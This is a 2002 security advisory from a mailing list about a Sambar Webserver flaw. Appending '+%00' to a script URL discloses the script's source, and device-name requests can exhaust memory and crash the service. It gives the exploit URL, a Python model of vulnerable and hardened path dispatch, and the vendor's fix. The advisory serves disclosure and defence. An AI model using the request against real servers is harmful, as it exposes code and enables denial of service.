[NT] Sambar Webserver Serverside Fileparse Bypass

From: support@securiteam.com
Date: 04/17/02


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Sambar Webserver Serverside Fileparse Bypass
------------------------------------------------------------------------

SUMMARY

A flaw in the serverside URL parsing could allow a malicious user to
bypass serverside fileparsing and display the source code of scripts. The
same flaw could allow a malicious user to crash the web service.

DETAILS

Vulnerable systems:
 - Sambar Webserver version 5.1p on Windows 2000
 - Other versions were not tested.

Immune systems:
 - Sambar Webserver version 5.2b on Windows 2000

It is possible to bypass the server-side parsing of scripts (.pl, .jsp,
.asp, .stm and similar) and download their source code. The same bypass
also lets a request name certain reserved DOS device names, which the
server then attempts to open. The resources used by such requests are not
freed properly, so the web server eventually runs out of memory and the
operating system kills the web service.

To bypass the server-side parsing, an attacker requests the resource with
a suffix of <space><null>. There are many ways to make a browser such as
Internet Explorer send this (in the example below the server decodes "+"
as a space and %00 as a NUL byte); an example of source code exposure is:

http://server/cgi-bin/environ.pl+%00

This returns the script's Perl source code instead of executing it:

# environ.pl: read the request body and echo the CGI environment back
read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print <<END;
GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO: $ENV{'PATH_INFO'}
PATH_TRANSLATED: $ENV{'PATH_TRANSLATED'}
QUERY_STRING: $ENV{'QUERY_STRING'}
REMOTE_ADDR: $ENV{'REMOTE_ADDR'}
REMOTE_HOST: $ENV{'REMOTE_HOST'}
REMOTE_USER: $ENV{'REMOTE_USER'}
REQUEST_METHOD: $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME: $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI: $ENV{'DOCUMENT_URI'}
SCRIPT_NAME: $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME: $ENV{'SCRIPT_FILENAME'}
SERVER_NAME: $ENV{'SERVER_NAME'}
SERVER_PORT: $ENV{'SERVER_PORT'}
SERVER_PROTOCOL: $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE: $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}
CONTENT: $CONTENT
END
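The bypass works because the handler is chosen from the extension of the
decoded request path, while the file is later opened by a C-string API
that stops at the NUL and ignores the trailing space. The following model
of that dispatch logic is an added example (it is not Sambar's code); the
document tree, the handler table and the two dispatch functions are
constructed for illustration, and the Windows reserved device names are
the ones documented by Microsoft. It shows the source-disclosure case, the
device-name case, and a hardened dispatcher that validates the decoded
path before either the extension lookup or the filesystem sees it.

```python
from urllib.parse import unquote_plus
import posixpath

# Constructed sample document tree: URL path -> file contents
DOCROOT = {
    "/cgi-bin/environ.pl": (
        "read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});\n"
        "print <<END;\nCONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}\nEND\n"
    ),
    "/index.html": "<html>ok</html>",
}

# Extensions the server must execute rather than serve as bytes (constructed)
SCRIPT_HANDLERS = {".pl": "perl", ".asp": "asp", ".jsp": "jsp", ".stm": "ssi"}

# Windows reserved device names; "dir\AUX" or "AUX.txt" still opens the device
WIN_DEVICES = ({"CON", "PRN", "AUX", "NUL"}
               | {f"COM{i}" for i in range(1, 10)}
               | {f"LPT{i}" for i in range(1, 10)})


def os_open(path):
    """Model of a C-string file open on Windows: the NUL terminates the
    string, trailing spaces are dropped, and a reserved device name in the
    last component maps to the device regardless of the directory."""
    path = path.split("\x00", 1)[0].rstrip(" ")
    stem = posixpath.basename(path).split(".", 1)[0].upper()
    if stem in WIN_DEVICES:
        return ("device", stem)          # a device handle, not a file
    if path in DOCROOT:
        return ("file", DOCROOT[path])
    return ("missing", None)


def dispatch_vulnerable(url_path):
    """Choose the handler from the extension of the raw decoded path.
    '/environ.pl+%00' decodes to '/environ.pl \\x00'; its extension
    '.pl \\x00' matches no handler, so the file is served verbatim."""
    decoded = unquote_plus(url_path)      # '+' -> ' ', '%00' -> NUL
    ext = posixpath.splitext(decoded)[1].lower()
    if ext in SCRIPT_HANDLERS:
        return ("execute", SCRIPT_HANDLERS[ext])
    kind, payload = os_open(decoded)
    if kind == "file":
        return ("serve-static", payload)  # source disclosure
    if kind == "device":
        return ("opened-device", payload)  # the leaked resource in the advisory
    return ("404", None)


def dispatch_hardened(url_path):
    """Reject the decoded path before the extension lookup or the filesystem
    sees it: control characters anywhere, trailing spaces or dots in a
    component (this also rejects '.' and '..' segments), and device names."""
    decoded = unquote_plus(url_path)
    if any(ord(c) < 0x20 or c == "\x7f" for c in decoded):
        return ("400", "control character in path")
    for part in decoded.split("/"):
        if part != part.rstrip(" ."):
            return ("400", "trailing space or dot in path component")
        if part.split(".", 1)[0].upper() in WIN_DEVICES:
            return ("400", "reserved device name")
    ext = posixpath.splitext(decoded)[1].lower()
    if ext in SCRIPT_HANDLERS:
        return ("execute", SCRIPT_HANDLERS[ext])
    kind, payload = os_open(decoded)
    return ("serve-static", payload) if kind == "file" else ("404", None)


if __name__ == "__main__":
    for url in ("/cgi-bin/environ.pl", "/cgi-bin/environ.pl+%00",
                "/cgi-bin/AUX+%00", "/index.html"):
        v, h = dispatch_vulnerable(url)[0], dispatch_hardened(url)[0]
        print(f"{url:26} vulnerable={v:14} hardened={h}")
```

The hardened version validates every path component rather than only
the last one, so the same check also covers device names used as a
directory and dot segments; the control-character test has to run on the
decoded path, since the NUL only appears after percent-decoding.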

Vendor response:
The vendor was contacted 3rd of April, 2002. The vendor confirmed the bug
on the same day, and notified us that a patch was being developed. On the
17th of April, the vendor released a new version that corrects the issues.

Corrective action:
The vendor has released version 5.2b, which is available here:
http://sambar.dnsaloas.org/win32-preview.tar.gz

ADDITIONAL INFORMATION

The information has been provided by Peter Gründl <pgrundl@kpmg.dk>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
